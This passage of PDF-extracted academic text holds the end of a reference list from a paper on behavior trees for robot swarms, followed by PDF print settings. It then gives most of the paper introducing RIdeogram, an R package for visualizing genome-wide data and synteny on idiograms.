http://iridia.ulb.ac.be/IridiaTrSeries/link/IridiaTr2018-002.pdf. Hasselmann K, Robert F, Birattari M. 2018. Automatic design of communication-based behaviors for robot swarms. In: Dorigo M, Birattari M, Garnier S, Hamann H, Montes de Oca M, Solnon C, Stützle T, eds. Swarm Intelligence—ANTS. Vol. 11172. Cham: Springer, 16–29. Hauert S, Zufferey J-C, Floreano D. 2009. Evolved swarming without positioning information: an application in aerial communication relay. Autonomous Robots 26(1):21–32 DOI 10.1007/s10514-008-9104-9. Hu D, Gong Y, Hannaford B, Seibel EJ. 2015. Semi-autonomous simulated brain tumor ablation with RavenII surgical robot using behavior tree. In: IEEE International Conference on Robotics and Automation, ICRA, Piscataway: IEEE, 3868–3875. Isla D. 2005. Handling complexity in the Halo 2 AI. In: Game Developers Conference, Vol. 12. Jakobi N, Husbands P, Harvey I. 1995. Noise and the reality gap: the use of simulation in evolutionary robotics. In: Morán F, Moreno A, Merelo JJ, Chacón P, eds. Advances in Artificial Life: Third European Conference on Artificial Life. Vol. 929. Berlin: Springer, 704–720. Ligot et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.314 25/27 http://dx.doi.org/10.3389/frobt.2016.00029 http://dx.doi.org/10.1007/s11721-015-0107-9 http://dx.doi.org/10.1007/s11721-014-0092-4 http://dx.doi.org/10.1080/01621459.1937.10503522 http://iridia.ulb.ac.be/IridiaTrSeries/link/IridiaTr2015-004.pdf http://dx.doi.org/10.3390/app10134654 http://dx.doi.org/10.1162/neco.1992.4.1.1 http://iridia.ulb.ac.be/IridiaTrSeries/link/IridiaTr2018-002.pdf http://dx.doi.org/10.1007/s10514-008-9104-9 http://dx.doi.org/10.7717/peerj-cs.314 https://peerj.com/computer-science/ Jones S, Studley M, Hauert S, Winfield A. 2018. Evolving behaviour trees for swarm robotics. In: Groß R, Kolling A, Berman S, Frazzoli E, Martinoli A, Matsuno F, Gauci M, eds. Distributed Autonomous Robotic Systems (DARS). Vol. 6. Cham: Springer, 487–501. Jones S, Winfield A, Hauert S, Studley M. 2019. Onboard evolution of understandable swarm behaviors. Advanced Intelligent Systems 1(6):1900031 DOI 10.1002/aisy.201900031. Kuckling J, Ligot A, Bozhinoski D, Birattari M. 2018a. Behavior trees as a control architecture in the automatic modular design of robot swarms. In: Dorigo M, Birattari M, Blum C, Christensen AL, Reina A, Trianni V, eds. Swarm Intelligence—ANTS. Vol. 11172. Cham: Springer, 30–43. Kuckling J, Ligot A, Bozhinoski D, Birattari M. 2018b. Search space for AutoMoDe-Chocolate and AutoMoDe-Maple. Technical Report TR/IRIDIA/2018-012, IRIDIA, Université Libre de Bruxelles, Brussels, Belgium. Available at http://iridia.ulb.ac.be/IridiaTrSeries/link/IridiaTr2018- 012.pdf. Kuckling J, Stützle T, Birattari M. 2020. Iterative improvement in the automatic modular design of robot swarms. PeerJ Computer Science (In press). Kuckling J, Ubeda Arriaza K, Birattari M. 2019. Simulated annealing as an optimization algorithm in the automatic modular design of robot swarms. In: Beuls K, Bogaerts B, Bontempi G, Geurts P, Harley N, Lebichot B, Lenaerts T, Gilles L, Van Eecke P, eds. Proceedings of the Reference AI & ML Conference for Belgium, Netherlands & Luxemburg, BNAIC/ BENELEARN 2019. Vol. 2491. Aachen: CEUR Workshop Proceedings. Ligot A, Birattari M. 2018. On mimicking the effects of the reality gap with simulation-only experiments. In: Dorigo M, Birattari M, Garnier S, Hamann H, Montes de Oca M, Solnon C, Stützle T, eds. Swarm Intelligence—ANTS. Vol. 11172. Cham: Springer, 109–122. Ligot A, Birattari M. 2019. Simulation-only experiments to mimic the effects of the reality gap in the automatic design of robot swarms. Swarm Intelligence 14(1):1–24 DOI 10.1007/s11721-019-00175-w. Ligot A, Kuckling J, Bozhinoski D, Birattari M. 2020. Automatic modular design of robot swarms using behavior trees as a control architecture. Available at http://iridia.ulb.ac.be/supp/ IridiaSupp2020-009/index.html. Lim C-U, Baumgarten R, Colton S. 2010. Evolving behaviour trees for the commercial game DEFCON. In: Di Chio C, Cagnoni S, Cotta C, Ebner M, Ekárt A, Esparcia-Alcázar AI, Goh C-K, Merelo JJ, Neri F, Preuss M, Togelius J, Yannakakis GN, eds. Applications of Evolutionary Computation. Vol. 6024. Berlin: Springer, 100–110. Lipson H. 2005. Evolutionary robotics and open-ended design automation. In: Bar-Cohen Y, ed. Biomimetics: Biologically Inspired Technologies. Vol. 17. Boca Raton: CRC Press, 129–155. López-Ibáñez M, Dubois-Lacoste J, Pérez Cáceres L, Birattari M, Stützle T. 2016. The irace package: iterated racing for automatic algorithm configuration. Operations Research Perspectives 3:43–58 DOI 10.1016/j.orp.2016.09.002. Marzinotto A, Colledanchise M, Smith C, Ögren P. 2014. Towards a unified behavior trees framework for robot control. In: IEEE International Conference on Robotics and Automation, ICRA, Piscataway: IEEE, 5420–5427. Mondada F, Bonani M, Raemy X, Pugh J, Cianci C, Klaptocz A, Magnenat S, Zufferey J-C, Floreano D, Martinoli A. 2009. The e-puck, a robot designed for education in engineering. In: Gonçalves P, Torres P, Alves C, eds. Proceedings of the 9th Conference on Autonomous Robot Systems and Competitions. Castelo Branco: Instituto Politécnico de Castelo Branco, 59–65. Nehaniv CL, Dautenhahn K. 2002. Imitation in animals and artifacts. First Edition. Cambridge: MIT Press. Ligot et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.314 26/27 http://dx.doi.org/10.1002/aisy.201900031 http://iridia.ulb.ac.be/IridiaTrSeries/link/IridiaTr2018-012.pdf http://iridia.ulb.ac.be/IridiaTrSeries/link/IridiaTr2018-012.pdf http://dx.doi.org/10.1007/s11721-019-00175-w http://iridia.ulb.ac.be/supp/IridiaSupp2020-009/index.html http://iridia.ulb.ac.be/supp/IridiaSupp2020-009/index.html http://dx.doi.org/10.1016/j.orp.2016.09.002 http://dx.doi.org/10.7717/peerj-cs.314 https://peerj.com/computer-science/ Neupane A, Goodrich M. 2019. Learning swarm behaviors using grammatical evolution and behavior trees. In: Kraus S, ed. Twenty-Eighth International Joint Conference on Artificial Intelligence (IJCAI-19). IJCAI, 513–520. Ögren P. 2012. Increasing modularity of UAV control systems using computer game behavior trees. In: Thienel J, ed. AIAA Guidance, Navigation, and Control Conference 2012. Reston: AIAA Meeting Papers, 358–393. Paxton C, Hundt A, Jonathan F, Guerin K, Hager GD. 2017. CoSTAR: instructing collaborative robots with behavior trees and vision. In: IEEE International Conference on Robotics and Automation, ICRA, Piscataway: IEEE, 564–571. Perez D, Nicolau M, O’Neill M, Brabazon A. 2011. Evolving behaviour trees for the Mario AI competition using grammatical evolution. In: Di Chio C, Cagnoni S, Cotta C, Ebner M, Ekárt A, Esparcia-Alcázar AI, Merelo JJ, Neri F, Preuss M, Richter H, Togelius J, Yannakakis GN, eds. Applications of Evolutionary Computation, Volume 6624 of Lecture Notes in Computer Science. Berlin: Springer, 123–132. Pinciroli C, Trianni V, O’Grady R, Pini G, Brutschy A, Brambilla M, Mathews N, Ferrante E, Di Caro GA, Ducatelle F, Birattari M, Gambardella LM, Dorigo M. 2012. ARGoS: a modular, parallel, multi-engine simulator for multi-robot systems. Swarm Intelligence 6(4):271–295 DOI 10.1007/s11721-012-0072-5. Quinn M, Smith L, Mayley G, Husbands P. 2003. Evolving controllers for a homogeneous system of physical robots: structured cooperation with minimal sensors. Philosophical Transactions of the Royal Society of London. Series A: Mathematical, Physical and Engineering Sciences 361(1811):2321–2343 DOI 10.1098/rsta.2003.1258. Şahin E. 2004. Swarm robotics: from sources of inspiration to domains of application. In: Şahin E, Spears WM, eds. Swarm Robotics, SAB. Vol. 3342. Berlin: Springer, 10–20. Salman M, Ligot A, Birattari M. 2019. Concurrent design of control software and configuration of hardware for robot swarms under economic constraints. PeerJ Computer Science 5(4):e221 DOI 10.7717/peerj-cs.221. Silva F, Duarte M, Correia L, Oliveira SM, Christensen AL. 2016. Open issues in evolutionary robotics. Evolutionary Computation 24(2):205–236 DOI 10.1162/EVCO_a_00172. Spaey G, Kegeleirs M, Garzón Ramos D, Birattari M. 2019. Comparison of different exploration schemes in the automatic modular design of robot swarms. In: Beuls K, Bogaerts B, Bontempi G, Geurts P, Harley N, Lebichot B, Lenaerts T, Gilles L, Van Eecke P, eds. Proceedings of the Reference AI & ML Conference for Belgium, Netherlands & Luxemburg, BNAIC/BENELEARN 2019. Vol. 2491. Aachen: CEUR Workshop Proceedings. Spears WM, Spears D, Hamann JC, Heil R. 2004. Distributed, physics-based control of swarms of vehicles. Autonomous Robots 17(2):137–162 DOI 10.1023/B:AURO.0000033970.96785.f2. Stranieri A, Turgut AE, Salvaro M, Garattoni L, Francesca G, Reina A, Dorigo M, Birattari M. 2013. IRIDIA’s arena tracking system. Technical Report TR/IRIDIA/2013-013, IRIDIA, Université libre de Bruxelles, Belgium. Available at http://iridia.ulb.ac.be/IridiaTrSeries/link/ IridiaTr2013-013.pdf. Trianni V. 2008. Evolutionary Swarm Robotics. Berlin: Springer. Trianni V. 2014. Evolutionary robotics: model or design? Frontiers in Robotics and AI 1:13 DOI 10.3389/frobt.2014.00013. Trianni V, Nolfi S. 2009. Self-organizing sync in a robotic swarm: a dynamical system view. IEEE Transactions on Evolutionary Computation 13(4):722–741 DOI 10.1109/TEVC.2009.2015577. Ligot et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.314 27/27 http://dx.doi.org/10.1007/s11721-012-0072-5 http://dx.doi.org/10.1098/rsta.2003.1258 http://dx.doi.org/10.7717/peerj-cs.221 http://dx.doi.org/10.1162/EVCO_a_00172 http://dx.doi.org/10.1023/B:AURO.0000033970.96785.f2 http://iridia.ulb.ac.be/IridiaTrSeries/link/IridiaTr2013-013.pdf http://iridia.ulb.ac.be/IridiaTrSeries/link/IridiaTr2013-013.pdf http://dx.doi.org/10.3389/frobt.2014.00013 http://dx.doi.org/10.1109/TEVC.2009.2015577 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.314 Automatic modular design of robot swarms using behavior trees as a control architecture Introduction Automode—maple Experimental setup Study 1: performance in simulation and reality Study 2: performance versus design budget Study 3: Maple and some of its possible variants Results Related work Conclusions References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS /CHT /DAN /DEU /ESP /FRA /ITA /JPN /KOR /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR /PTB /SUO /SVE /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_5omcr5wpnfgplho6goba5fsek4 ---- Submitted 29 August 2019 Accepted 19 December 2019 Published 20 January 2020 Corresponding authors Guangchuang Yu, gcyu1@smu.edu.cn Jinhui Chen, chenjh@njfu.edu.cn Academic editor Sebastian Ventura Additional Information and Declarations can be found on page 7 DOI 10.7717/peerj-cs.251 Copyright 2020 Hao et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS RIdeogram: drawing SVG graphics to visualize and map genome-wide data on the idiograms Zhaodong Hao1,2, Dekang Lv3, Ying Ge3, Jisen Shi1, Dolf Weijers2, Guangchuang Yu4 and Jinhui Chen1 1 Key Laboratory of Forest Genetics & Biotechnology of Ministry of Education, Co-Innovation Center for Sustainable Forestry in Southern China, Nanjing Forestry University, Nanjing, Jiangsu, China 2 Laboratory of Biochemistry, Wageningen University, Wageningen, Haarlem, Netherlands 3 Institute of Cancer Stem Cell, Dalian Medical University, Dalian, Liaoning, China 4 Institute of Bioinformatics, School of Basic Medical Sciences, Southern Medical University, Guangzhou, Guangdong, China ABSTRACT Background. Owing to the rapid advances in DNA sequencing technologies, whole genome from more and more species are becoming available at increasing pace. For whole-genome analysis, idiograms provide a very popular, intuitive and effective way to map and visualize the genome-wide information, such as GC content, gene and repeat density, DNA methylation distribution, genomic synteny, etc. However, most available software programs and web servers are available only for a few model species, such as human, mouse and fly, or have limited application scenarios. As more and more non-model species are sequenced with chromosome-level assembly being available, tools that can generate idiograms for a broad range of species and be capable of visualizing more data types are needed to help better understanding fundamental genome characteristics. Results. The R package RIdeogram allows users to build high-quality idiograms of any species of interest. It can map continuous and discrete genome-wide data on the idiograms and visualize them in a heat map and track labels, respectively. Conclusion. The visualization of genome-wide data mapping and comparison allow users to quickly establish a clear impression of the chromosomal distribution pattern, thus making RIdeogram a useful tool for any researchers working with omics. Subjects Bioinformatics, Data Science, Graphics, Visual Analytics Keywords Genome, Chromosome, Idiogram, R package, Data visualization INTRODUCTION Recently, with the development of sequencing technologies, especially rapid advances in third generation sequencing including Pacific Biosciences (Eid et al., 2009) and Oxford Nanopore Technologies (Laver et al., 2015), BioNano genome mapping (Cao et al., 2014) and high-throughput chromatin conformation capture sequencing (Dekker et al., 2002), more and more species have their genomes sequenced or updated to the chromosome level (Jiao & Schneeberger, 2017; Phillippy, 2017). After the chromosome-level genome completion, an overview of some genome characteristics can help to better understand a How to cite this article Hao Z, Lv D, Ge Y, Shi J, Weijers D, Yu G, Chen J. 2020. RIdeogram: drawing SVG graphics to visualize and map genome-wide data on the idiograms. PeerJ Comput. Sci. 6:e251 http://doi.org/10.7717/peerj-cs.251 https://peerj.com/computer-science mailto:gcyu1@smu.edu.cn mailto:chenjh@njfu.edu.cn https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.251 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.251 species genome, such as gene and transposon distribution across the sunflower genome (Badouin et al., 2017). An idiogram, also known as a karyotype, is defined as the phenotypic appearance of chromosomes in the nucleus of an eukaryotic cell and has been widely used to visualize the genome-wide data since the first web server, Idiographica, came online in 2007 (Kin & Ono, 2007). There are dozens of tools have been developed for circular genome visualization with a Perl language-based tool Circos being the most used one (Krzywinski et al., 2009; Parveen, Khurana & Kumar, 2019). In contrast, there are not many alternatives for non- circular plots of whole genome information on idiograms. Although few R packages, like GenomeGraphs (Durinck et al., 2009), ggbio (Yin, Cook & Lawrence, 2012), IdeoViz (Pai & Ren, 2014), chromPlot (Orostica & Verdugo, 2016) and chromDraw (Janecka & Lysak, 2016), and JavaScript libraries, like Ideogram.js (Weitz et al., 2017) and karyotypeSVG (Prlic, 2017), have been developed for non-circular genome visualization, they are either limited in several species and data visualization types or lacking the ample customization. Recently, two R packages, karyoploteR (Gel & Serra, 2017) and chromoMap (Anand, 2019), with strengthened capacities have been developed. However, one function that all these non-circular plots fail to achieve, as Circos does, is to visualize the relationship between two or more species using Bezier curves on idiograms. This function is very useful and allows to interpret genome-wide relationships more intuitively, especially in the visualization of whole genome duplication. Indeed, Circos is usually used to show syntenic blocks both in inter- and intraspecies genome comparisons using Bezier curves (Hu et al., 2019; Wang et al., 2019). Thus, there is a lack of a R package for non-circular genome visualization and allowing to visualize genome-wide relationships between two or more species using Bezier curves on idiograms. Scalable Vector Graphics (SVG) is a language for describing two-dimensional graphics applications and images. SVG graphics is defined in an eXtensible Markup Language (XML) text file which means that one can easily use any text editor or drawing software to create and edit SVG graphics. Most R graphics packages are built on two graphics systems, the traditional graphics system and the grid graphics system. Here, we developed an R package (RIdeogram) to draw high-quality idiograms without species limitations, that allows to visualize and map whole-genome information on the idiograms based on the SVG language. Besides, RIdeogram can also be used to show the genome synteny with Bezier curves linking the syntenic blocks on idiograms. DESCRIPTION The package RIdeogram is written in R (R Core Team, 2018), one of the most popular programming languages widely used in statistical computing, data analytics and graphics. However, this new R graphics package is not built based on any existing graphics systems. We use the R environment to read the custom input files and calculate the drawing element positions in a coordinate system. Then, we use R to write all element information into a text file following the XML format which are used to define graphics by the SVG language. A list of the currently implemented commands is given in Table 1. In general, there are three Hao et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.251 2/11 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.251 Table 1 Functions contained in the package RIdeogram. Function name Description GFFex Extract information from a GFF3 format genome annotation fill ideogram Map and visualize the genome-wide data on the idiograms convertSVG Convert the output file from the SVG format to the format users chose svg2tiff Convert the output file from the SVG format to the TIFF format svg2pdf Convert the output file from the SVG format to the PDF format svg2jpg Convert the output file from the SVG format to the JPG format svg2png Convert the output file from the SVG format to the PNG format main functions, GFFex, ideogram and convertSVG implemented in the package RIdeogram. Users can use the function data to load the example data or the basic R function read.table to load the custom data from local files. The function GFFex can be used to extract the information from a GFF3 format genome annotation file. Then, the function ideogram can be used to compute the information for all drawing elements based on the input files and generate a A4-sized SVG file containing a vector graphic which can be conveniently viewed and modified using the software Adobe Illustrator or Inkscape. Alternatively, users can also use the function convertSVG to convert this SVG file into an adjustable image format (pdf, png, tiff, or jpg) with a user-defined resolution according to the practical requirements. In general, there are two types of data, i.e., continuous and discrete data. For mapping and visualizing, RIdeogram considers the continuous data, such as gene density across the whole genome in 1-Mb windows, as overlaid features and maps them on the idiograms with dark/light colors representing high/low values. For the other data type that are scattered throughout the whole genome, such as the chromosomal distribution of members in one gene family, RIdeogram can add track labels next to the idiograms with three shapes (box, circle and triangle) available to represent different characteristics of these members, such as the subclade that one gene member belongs to. Users can also combine the shapes and colors to represent more than three distinct characteristic types. Furthermore, users can also map the continuous data as a heatmap, a line or area chart along the idiograms. In addition, RIdeogram also provides functions for the visualization of dual and ternary genome synteny using Bezier curves on the idiograms. RIdeogram is available through CRAN (https://cran.r-project.org/web/packages/ RIdeogram/) and is developed on GitHub (https://github.com/TickingClock1992/ RIdeogram). Further extensions in development and fixes can be seen in the issue listing page on the package’s GitHub page. The new function that we are planning to implement in next version include, but are not limited to, developing more types of data visualization along the idiograms, visualizing genome synteny for more species and enlarging the Hao et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.251 3/11 https://peerj.com https://cran.r-project.org/web/packages/RIdeogram/ https://cran.r-project.org/web/packages/RIdeogram/ https://github.com/TickingClock1992/RIdeogram https://github.com/TickingClock1992/RIdeogram http://dx.doi.org/10.7717/peerj-cs.251 user-specified genome regions to display detailed characteristics, as we gather more from users. EXAMPLES Our first example use the data contained in this package. After the completion of genome sequencing, assembly and annotation, RIdeogram can be used to give some idea of how genes are distributed across the whole genome. The example data contained numbers of protein-coding genes calculated in 1-Mb windows which can be considered as continues data and positions of 500 random selected non-coding RNAs, including ribosomal RNAs (rRNAs), transfer RNAs (tRNAs) and microRNAs (miRNAs), which can be considered as discrete data. RIdeogram maps the gene density information on the idiograms as overlaid features in a heat map and adds track labels next to the idiograms with green boxes, purple circles and orange triangles representing rRNAs, tRNAs and miRNAs, respectively (Fig. 1). Obviously, inter- and intra-chromosomal gene distributions are non-uniform. For instance, the chromosomal regions adjacent to the centromeres are gene-poor in chromosome 1, 9 and 16 while those are gene-rich in chromosome 11, 14 and 17. This function can be applied to many different situations, such as single nucleotide polymorphism (SNP) density and candidate markers (Fig. S1 & Data S1, original data see Li et al., 2019), DNA methylation dynamics and potential activated genes (Fig. S2 & Data S2, original data see Huang et al., 2019) and transcription factor (TF) binding sites and candidate target genes (Fig. S3 & Data S3, original data see Shamimuzzaman & Vodkin, 2013). Besides visualizing some specific genome characteristics across the whole genome at the chromosome level as showed in Fig. 1, RIdeogram can also be used to compare two relevant genome features, such as gene and repeat density, which will provide some important implications for better understanding the relevance of chromosomal distribution patterns of these two features. The example data implemented in this package also contained the information of long terminal repeat (LTR) distribution across the human genome. Since the transposable elements have been suggested to have a potential detrimental effect on gene expression (Hollister & Gaut, 2009), the distributions of gene and LTR are supposed to be opposite across the whole genome as a result of natural selection. As expect, the region that has a relatively high gene content usually has a relatively low LTR density and vice versa (Fig. S4), indicating that LTR seems to avoid inserting in the regions with a high gene content in the genome. This similar phenomenon was also observed in the sunflower genome explained using two idiogram graphics, one showing the gene distribution and the other showing the LTR distribution (Badouin et al., 2017). Using RIdeogram, users can integrate these two graphics into one, much easier for researchers to interpret and readers to understand. Apart from the differences, this function can also be used to show the similarities, like the similar genetic diversity patterns across the whole genome between two geographical groups of the same species, in different label types (Fig. S5 & Data S4, Fig. S6, original data see Chen et al., 2019). In addition, RIdeogram can also be used to show syntenic comparisons between two or three genomes. As shown in Fig. 2, the syntenic blocks between each pair of species, Hao et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.251 4/11 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.251#supp-1 http://dx.doi.org/10.7717/peerj-cs.251#supp-8 http://dx.doi.org/10.7717/peerj-cs.251#supp-2 http://dx.doi.org/10.7717/peerj-cs.251#supp-9 http://dx.doi.org/10.7717/peerj-cs.251#supp-3 http://dx.doi.org/10.7717/peerj-cs.251#supp-10 http://dx.doi.org/10.7717/peerj-cs.251#supp-4 http://dx.doi.org/10.7717/peerj-cs.251#supp-5 http://dx.doi.org/10.7717/peerj-cs.251#supp-11 http://dx.doi.org/10.7717/peerj-cs.251#supp-6 http://dx.doi.org/10.7717/peerj-cs.251 Figure 1 Gene distribution across the whole human genome. The overlaid heatmap shows the gene density and the tack labels refer to 500 random selected RNAs consisted of rRNAs (green boxes), tRNA (purple circles) and miRNA (orange triangles) locus across the human genome. Annotation information was downloaded from the GENCODE website (https://www.gencodegenes.org). Full-size DOI: 10.7717/peerjcs.251/fig-1 which were identified using MCScan (Tang et al., 2008), were plotted. Particularly, a typical ancestral region in the basal angiosperm Amborella can be tracked to up to two regions in Liriodendron and to up to three regions in grape. Based on the fact that no lineage-specific polyploidy event has been found in Amborella and a whole-genome triplication has been detected in grape, it is reasonable to assume a single Liriodendron lineage-specific whole genome duplication event (Chen et al., 2019). Furthermore, RIdeogram allows to visualize a dual genome comparison, such as the genome synteny between human and mouse (Fig. S7 and Data S5). Compared to autosomes, the syntenic blocks between human and mouse X chromosomes occupy almost the entirety of each X chromosome, suggesting a highly conserved syntenic relationship of the X chromosome within the eutherian mammalian lineage (Ross et al., 2005). Hao et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.251 5/11 https://peerj.com https://www.gencodegenes.org https://doi.org/10.7717/peerjcs.251/fig-1 http://dx.doi.org/10.7717/peerj-cs.251#supp-7 http://dx.doi.org/10.7717/peerj-cs.251#supp-12 http://dx.doi.org/10.7717/peerj-cs.251 Figure 2 Syntenic comparison of three plant genomes. Genome synteny patterns show that a typical an- cestral region in the basal angiosperm Amborella can be tracked to up to two regions in Liriodendron and to up to three regions in grape. Gray wedges in the background highlight major syntenic blocks spanning more than 30 genes between the genomes (highlighted by one syntenic set shown in colored). Full-size DOI: 10.7717/peerjcs.251/fig-2 CONCLUSION The RIdeogram package provides an efficient and effective way to build idiograms with no species limitations and map genome-wide information on the idiograms for better visualizing and understanding the chromosomal distribution patterns of some particular genomic features. Meanwhile, this package can be also used to visualize syntenic analysis between genomes. Additionally, it is user-friendly and accessible for biologists without extensive computer programming expertise. Finally, RIdeogram can generate two types of images, a vector graphic or a bitmap file, both in high-quality and meeting conventional requirements for direct use in presentations or journal publications. Hao et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.251 6/11 https://peerj.com https://doi.org/10.7717/peerjcs.251/fig-2 http://dx.doi.org/10.7717/peerj-cs.251 ACKNOWLEDGEMENTS We thank Dr. Zhongjuan Zhang for her comments on the manuscript. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by the Key Research and Development Plan of Jiangsu Province (BE2017376), the Foundation of Jiangsu Forestry Bureau (LYKJ[2017]42), the Qinglan Project of Jiangsu Province and the Priority Academic Program Development of Jiangsu Higher Education Institutions (PAPD). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Key Research and Development Plan of Jiangsu Province: BE2017376. Foundation of Jiangsu Forestry Bureau: LYKJ[2017]42. Qinglan Project of Jiangsu Province. Priority Academic Program Development of Jiangsu Higher Education Institutions (PAPD). Competing Interests The authors declare there are no competing interests. Author Contributions • Zhaodong Hao conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • Dekang Lv performed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. • Ying Ge performed the experiments, performed the computation work, authored or reviewed drafts of the paper, typeset the code, and approved the final draft. • Jisen Shi and Dolf Weijers performed the experiments, authored or reviewed drafts of the paper, and approved the final draft. • Guangchuang Yu and Jinhui Chen conceived and designed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: Data and codes are available at GitHub: https://github.com/TickingClock1992/ RIdeogram. Hao et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.251 7/11 https://peerj.com https://github.com/TickingClock1992/RIdeogram https://github.com/TickingClock1992/RIdeogram http://dx.doi.org/10.7717/peerj-cs.251 Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.251#supplemental-information. REFERENCES Anand L. 2019. 